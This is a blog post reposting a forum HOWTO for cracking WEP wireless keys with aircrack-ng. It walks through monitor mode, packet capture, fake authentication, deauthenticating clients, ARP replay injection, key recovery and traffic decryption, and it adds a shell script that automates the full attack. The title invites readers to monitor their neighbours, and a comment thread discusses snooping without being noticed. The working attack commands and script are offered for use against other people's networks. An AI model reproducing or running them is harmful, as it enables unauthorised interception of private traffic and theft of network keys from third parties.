
Aircrack-NG, monitor wireless traffic on your network, heck… monitor your neighbors ;)

So I wanted to show users how to sniff out their local wireless traffic, capture it and decrypt it. However, before I made up a long-winded post I decided to research it and see if someone else had done the work already. Sure enough someone has, so take a look at the following link. The article is geared towards identifying wireless security holes and exploiting them, but I’ll let you read the rest. It’s not advanced stuff; you can learn more about aircrack-ng if still interested.

I’ve copied the poster’s contents here, if you don’t want to deal with the link. If you want the screenshots, you’ll have to sign into the forums.

GENERAL INFORMATION:
Generally speaking there are 3 types of attacks:

1. Brute force attack
2. Dictionary attack
3. Statistical attack

WEP prepends a 24-bit initialization vector (IV) to the secret key and uses the result directly as the RC4 key for each packet. The IV space is small enough to repeat on a busy network, and certain classes of IVs leak information about individual key bytes. Aircrack-ng exploits these weaknesses with a statistical method to recover WEP keys: provided that you have collected a sufficient number of IVs (see CAPTURING below for how many), and depending on the length of the encryption key, determining the actual WEP key will take less than a minute on a common PC.

HARDWARE:
I assume that you have successfully patched the driver for your wireless adapter (e.g. Ralink chipset), so I won’t go into this. I have tested packet injection and decryption with:

1. Intel® PRO/Wireless 2200BG (IPW2200)
2. Linksys WUSB54G V4.0 (RT2570)

I recommend “Linksys WUSB54G V4.0” as it has a decent reception and reasonable performance. If you need help patching & compiling from source, feel free to post your problems here as well.

DRIVERS & PATCHES:
Before you proceed you need to compile your own drivers & install patches for packet re-injection. You will find instructions here.

PREREQUISITES:
1. You have successfully patched your wireless driver (see link above).
2. This HOWTO was written for Aircrack-NG v0.9.1 & Aircrack-PTW v1.0.0 on Kubuntu Feisty Fawn 7.04 (32-bit).
3. ‘00:09:5B:D7:43:A8’ is the MAC address of my network, so you need to replace it with your own.
4. ‘00:00:00:00:00:00’ is the MAC address of the target client, NOT that of your own wireless card.

COMMAND LINE:
Please make sure that you stick to the exact sequence of actions and pay attention to the section on MAC filtering.

  • 1. Enable monitoring with “airmon-ng” (screenshot #1):
    sudo airmon-ng start <interface> <channel>

  • 2. Packet capturing with “airodump-ng” (screenshot #2):
    sudo airodump-ng --channel <channel> --write <file_name> <interface>

    Alternatively, try this (to collect data from the target network only and hence increase performance):

    sudo airodump-ng --channel <channel> --bssid 00:09:5B:D7:43:A8 --write <file_name> <interface>

    NOTE:
    --channel… Select preferred channel; optional, however, channel hopping severely impacts and thus slows down the collection process, and the injection steps below only work while the card sits on the target’s channel.
    --bssid… MAC address of target access point; optional, however, specifying the access point will improve performance of the collection process.
    --write… Preferred file name prefix; mandatory field (in our case).

  • 3.1. Now check whether MAC filtering is enabled or turned off by attempting a fake authentication:
    sudo aireplay-ng -1 0 -e <target_essid> -a 00:09:5B:D7:43:A8 -h MY:MA:CA:DD:RE:SS <interface>

    NOTE:
    -1… Fake authentication. The number is the re-association delay in seconds; ‘0’ means a single authentication/association attempt. (This does not deauthenticate anybody; deauthentication is ‘-0’, used in the ‘MAC filtering’ section below.)
    -e… ESSID of target access point.
    -a… MAC address of target access point.
    -h… Source MAC address of your choice. Any address will do here, because the point is to see whether the access point accepts a client it has never seen.

  • 3.2. If the resulting output looks like this…
    18:22:32 Sending Authentication Request
    18:22:32 Authentication successful
    18:22:32 Sending Association Request
    18:22:32 Association successful :-)

    …then MAC filtering is turned off & you can continue with section ‘No MAC filtering’. If the authentication or association step fails or simply times out, first double-check that you are on the right channel and that the ESSID and BSSID are correct (those mistakes produce the same symptom); if they are, assume MAC filtering is on and jump to section ‘MAC filtering’.

>> No MAC filtering <<

  • 4. Packet Re-injection with “aireplay-ng” (screenshot #4):
    sudo aireplay-ng -3 -b 00:09:5B:D7:43:A8 -h MY:MA:CA:DD:RE:SS <interface>

    You’ll now see the number of data packets shooting up in ‘airodump-ng’. This process can take up to five minutes before you start receiving any ARP requests, so be a little patient at this point. As MAC filtering is off, use an arbitrary MAC address (‘MY:MA:CA:DD:RE:SS’), but it must be the same address you fake-authenticated with in step 3.1: the access point only accepts data frames from associated stations and silently drops the replayed ARP requests otherwise.

    Continue with #6.

    NOTE:
    -3… Standard ARP-request replay.
    -b… MAC address of target access point.
    -h… MAC address of your choice (the one associated in step 3.1).

>> MAC filtering <<

  • 4. Deauthentication with “aireplay-ng” (screenshot #3):
    sudo aireplay-ng -0 5 -a 00:09:5B:D7:43:A8 -c 00:00:00:00:00:00 <interface>

    Because the access point only talks to whitelisted clients, you cannot associate with a MAC of your own; instead you borrow the address of a client that is already associated (pick one from the station list at the bottom of the airodump-ng screen). Kicking that client off forces it to reconnect, and a reconnecting client normally sends an ARP request, which is exactly the packet the replay attack in the next step is waiting for.

    NOTE:
    -0… Deauthentication; the number is how many deauthentication bursts to send (‘0’ means keep sending until you stop it).
    -a… MAC address of target access point.
    -c… MAC address of the client to deauthenticate.

  • 5. Packet Re-injection with “aireplay-ng” (screenshot #4):
    sudo aireplay-ng -3 -b 00:09:5B:D7:43:A8 -h 00:00:00:00:00:00 <interface>

    You’ll now see the number of data packets shooting up in ‘airodump-ng’. This process can take up to five minutes before you start receiving any ARP requests, so be a little patient at this point.

    NOTE:
    -3… Standard ARP-request replay.
    -b… MAC address of target access point.
    -h… Client MAC address (the client you just deauthenticated, so that the access point accepts the replayed frames).

  • 6. Key recovery with “aircrack-ng” & “aircrack-ptw” (screenshot #5):
    Note that airodump-ng numbers its output files: ‘--write <file_name>’ produces ‘<file_name>-01.cap’ (then -02, -03… on later runs), not ‘<file_name>.cap’. You can start aircrack-ng while airodump-ng is still capturing; it re-reads the file and retries as the IV count grows.

    Aircrack-ng:
    sudo aircrack-ng <file_name>-01.cap

    Aircrack-PTW:
    ./aircrack-ptw <file_name>-01.cap

    Both tools only recover the key. To actually decrypt the captured traffic afterwards, give the key and the capture to airdecap-ng from the same suite (‘airdecap-ng -w <hex_key> <file_name>-01.cap’), which writes a decrypted copy you can open in Wireshark.
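The six steps above as a single script, added here as an example; it is not the forum poster’s script nor part of the aircrack-ng project. It assumes the aircrack-ng 0.9 flags exactly as used in the HOWTO, a Ralink USB interface called ‘rausb0’, and placeholder ESSID, channel and source MAC values (all assumptions, overridable through the environment). The input checks and the fake-auth branch decision are separated into functions so they can be exercised without a wireless card; the two sample aireplay-ng outputs at the bottom are constructed for that purpose, not real captures. Only run it against a network you own or are authorised to test.

```shell
#!/bin/sh
# wep_audit.sh: the HOWTO's steps 1-6 as one script (added example, not the
# original poster's or the aircrack-ng project's code). Assumes aircrack-ng 0.9
# command-line flags as used on this page. All values below are placeholders.

AP_BSSID="${AP_BSSID:-00:09:5B:D7:43:A8}"      # target AP, from the HOWTO
AP_ESSID="${AP_ESSID:-targetnet}"              # assumed ESSID placeholder
CLIENT_MAC="${CLIENT_MAC:-00:00:00:00:00:00}"  # associated client (HOWTO placeholder)
MY_MAC="${MY_MAC:-00:11:22:33:44:55}"          # arbitrary MAC for fake auth (assumed)
IFACE="${IFACE:-rausb0}"                       # assumed RT2570 interface name
CHANNEL="${CHANNEL:-6}"                        # assumed target channel
PREFIX="${PREFIX:-wepcap}"                     # airodump-ng --write prefix

# Input checks: a typo in a MAC makes every later step fail silently.
valid_mac() {
    printf '%s' "$1" | grep -Eq '^([0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2}$'
}

# 2.4 GHz channels are 1-14 (14 is Japan only); anything else is a typo.
valid_channel() {
    case "$1" in ''|*[!0-9]*) return 1 ;; esac
    [ "$1" -ge 1 ] && [ "$1" -le 14 ]
}

# airodump-ng --write PREFIX numbers its files: the first run is PREFIX-01.cap.
capture_file() {
    printf '%s-01.cap' "$1"
}

# Step 3.2: "Association successful" in the fake-auth output means no MAC
# filtering (or our MAC is whitelisted). Returns 0 = open, 1 = filtered/failed.
mac_filter_off() {
    printf '%s' "$1" | grep -q 'Association successful'
}

# Step 3.1, wrapped so its output can be examined.
fake_auth() {
    sudo aireplay-ng -1 0 -e "$AP_ESSID" -a "$AP_BSSID" -h "$1" "$IFACE" 2>&1
}

run_attack() {
    for m in "$AP_BSSID" "$CLIENT_MAC" "$MY_MAC"; do
        valid_mac "$m" || { echo "bad MAC address: $m" >&2; return 1; }
    done
    valid_channel "$CHANNEL" || { echo "bad channel: $CHANNEL" >&2; return 1; }

    # Step 1: monitor mode, pinned to the target channel (no hopping).
    sudo airmon-ng start "$IFACE" "$CHANNEL"

    # Step 2: capture only the target BSSID, in the background.
    sudo airodump-ng --channel "$CHANNEL" --bssid "$AP_BSSID" \
        --write "$PREFIX" "$IFACE" >/dev/null 2>&1 &
    dump_pid=$!
    sleep 5   # let airodump-ng settle before injecting

    # Step 3: the fake-auth result decides which branch (4/5) we take.
    if mac_filter_off "$(fake_auth "$MY_MAC")"; then
        src_mac="$MY_MAC"                                # >> No MAC filtering <<
    else
        src_mac="$CLIENT_MAC"                            # >> MAC filtering <<
        sudo aireplay-ng -0 5 -a "$AP_BSSID" -c "$CLIENT_MAC" "$IFACE"
    fi

    # Step 4/5: ARP replay using the MAC the access point will accept.
    sudo aireplay-ng -3 -b "$AP_BSSID" -h "$src_mac" "$IFACE" >/dev/null 2>&1 &
    replay_pid=$!

    # Step 6: aircrack-ng re-reads the growing capture until the key falls out;
    # -b restricts it to our AP in case other traffic slipped into the file.
    sudo aircrack-ng -b "$AP_BSSID" "$(capture_file "$PREFIX")"
    rc=$?
    kill "$replay_pid" "$dump_pid" 2>/dev/null
    return "$rc"
}

# Constructed sample aireplay-ng -1 outputs (not real captures) so the branch
# decision can be tested without a wireless card.
SAMPLE_OPEN='18:22:32 Sending Authentication Request
18:22:32 Authentication successful
18:22:32 Sending Association Request
18:22:32 Association successful :-)'
SAMPLE_FILTERED='18:22:32 Sending Authentication Request
18:22:35 Sending Authentication Request
18:22:38 Sending Authentication Request'

# Only touch the radio when explicitly asked:  sh wep_audit.sh run
if [ "${1:-}" = "run" ]; then
    run_attack
fi
```

The script makes the decision in step 3.2 explicit: the only thing that separates the two branches is which source MAC the access point is willing to associate, so that address is computed once and reused for the ARP replay. Run it with the ‘run’ argument after exporting your own AP_BSSID, AP_ESSID, CLIENT_MAC, IFACE and CHANNEL.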

CAPTURING:
This is a summary based on information given here and there, respectively. The figures are data packets, each carrying a fresh IV, which is what the ‘#Data’ column in airodump-ng counts for the target network; they are rough averages, and a particular key may need noticeably more or fewer:

Aircrack-NG:
64-bit key: ~250,000 packets
128-bit key: ~1,500,000 packets

Aircrack-PTW:
64-bit key: ~20,000 packets [estimate]
128-bit key: ~85,000 packets

FINALLY:
That’s it. I am open for further suggestions and hope to gain as much input as possible so that we can improve this guide and at the same time, keep it as simple as possible for other users.

  1. anthonyvenable110
    March 9, 2012 at 1:46 am

    Very informative

  2. anthonyvenable110
    March 9, 2012 at 1:46 am

    Reblogged this on anthonyvenable110.

  3. September 30, 2012 at 9:42 am

    What precautions do we need to take to ensure that people don’t know who is snooping? I assume using a non-obvious host name as in not using “sfeolepc”. Anything else?

    • October 17, 2012 at 10:44 am

      Actually, the average user isn’t going to know that you’re snooping. All wireless traffic is out in the open. The safeguard we use is to encrypt the transmissions via WEP, WPA, WPA2, etc. Once you get hold of those keys, you can intercept the traffic after it leaves the router on its way to the user’s device. They won’t know that it’s been breached. The only safeguard you can take to make sure your wifi traffic is secure is to use the highest form of encryption available with a very, very strong 128+ key over 10 characters (alphanumeric). Also DISABLE your SSID broadcast; believe it or not, that’s the 1st big step to veer away any snoops.
